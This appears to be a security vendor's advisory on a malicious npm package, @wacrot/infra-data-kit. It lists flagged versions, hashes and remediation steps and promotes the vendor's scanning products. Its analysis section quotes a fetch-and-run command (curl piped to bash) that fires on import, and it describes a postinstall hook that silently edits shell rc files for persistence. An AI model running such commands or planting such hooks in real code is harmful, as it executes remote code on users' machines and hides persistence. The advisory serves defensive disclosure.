Which versions of @wacrot/infra-data-kit are malicious?

The following npm versions of @wacrot/infra-data-kit are flagged malicious: 2.0.6, 2.0.7, 2.0.8, 2.0.9, 2.1.0, 2.1.1, 2.1.2, 2.1.4. Treat any of these as compromised.

How do I remediate @wacrot/infra-data-kit if I installed it?

Remove @wacrot/infra-data-kit from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound activity or persistence.

I already installed @wacrot/infra-data-kit — how do I know if it already compromised me?

If @wacrot/infra-data-kit was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

Is @wacrot/infra-data-kit part of a known attack campaign?

Yes — @wacrot/infra-data-kit is associated with the IN-MAL-2026-006715, IN-MAL-2026-006716, IN-MAL-2026-006711, IN-MAL-2026-006718, IN-MAL-2026-006713, IN-MAL-2026-006717, IN-MAL-2026-006714, IN-MAL-2026-006712 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

How do I find @wacrot/infra-data-kit across my projects, lockfiles, and CI pipelines?

Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for @wacrot/infra-data-kit (8 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging @wacrot/infra-data-kit across your stack and pipelines.

Malicious package

@wacrot/infra-data-kitnpm

Malicious code in @wacrot/infra-data-kit (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5834

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall @wacrot/infra-data-kit

What this malware does

On any require() or import of @wacrot/infra-data-kit, src/index.js invokes addSupport() at module top level, which spawns a detached bash -c 'curl -fsSL https://example.com/script.sh | bash' via node:child_process with stdio ignored and errors swallowed by empty catch blocks. This is a textbook fetch-and-execute dropper embedded in a package advertised as a GeoJSON / data utility, and it fires automatically on import with no user consent or verification. Separately, package.json declares a postinstall hook (npx no-install @wacrot/infra-data-kit npm run scripts/setup.js) which executes scripts/setup.js at install time. setup.js locates the first of ~/.zshrc, ~/.bashrc, ~/.profile, makes a.bak copy, and inserts a new line into the file. The current inserted line is benign (export MY_CUSTOM_VAR='test'), but the primitive is silent, persistent modification of the installer's shell rc files on every install — the standard mechanism for attacker persistence via PATH/alias/source hooks. The atypical postinstall invocation through npx no-install further obscures lifecycle inspection. The destination URL https://example.com/script.sh is a placeholder; the mechanism is fully wired and any future republish or DNS pivot delivers attacker-controlled shell code to every installer.

Malicious versions

8 flagged

2.0.62.0.72.0.82.0.92.1.02.1.12.1.22.1.4

Indicators of compromise (SHA-256)

1568dfa61d19a63f6837c4a8c9b5d728401d0f34c87ce3550af594c141a94ac1

9b786922d30a4bf2895ccc72832e755017c2a6086b60a41546477353cad7a002

ed3dbc1e873b9aeef4db7a0118d43e32ef55ba4f0bdbe60601f26dfb9f9465df

2fae648a1c4f2f52a58e92d0877909d0c257de08ac85648b26c05cfaeed735c4

48b21f9afd4984fc6e40d4d6d9d22118936bbbda62480fceb51e2a1e05d7f2fe

5a287471a6a92d725824819ebe06e1f705cbce4f1a67443be50872c034e4eb6e

6dffaaac09416f6badd0af76a7fd930025004f4d7eed785c4cb8d275a55287cc

7ef0c37effa4d55594ab9723da3aa953b0a6826726083f7ae264d913389e36ed

Detection & response playbook

Malicious package

Find it
Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for @wacrot/infra-data-kit (8 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging @wacrot/infra-data-kit across your stack and pipelines.
If you installed it — respond
Remove @wacrot/infra-data-kit from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound activity or persistence.
Did it already run?
If @wacrot/infra-data-kit was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.
How O3 protects you
O3 blocks @wacrot/infra-data-kit before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. @wacrot/infra-data-kit on npm has been identified as a malicious package (versions 2.0.6, 2.0.7, 2.0.8, 2.0.9, 2.1.0, 2.1.1, 2.1.2, 2.1.4 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006715IN-MAL-2026-006716IN-MAL-2026-006711IN-MAL-2026-006718IN-MAL-2026-006713IN-MAL-2026-006717IN-MAL-2026-006714IN-MAL-2026-006712

References

Credits

Amazon Inspector · finder

Detect & block this

O3 blocks @wacrot/infra-data-kit-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the malicious outbound activity and severs the channel.

Malware detection Runtime egress monitoring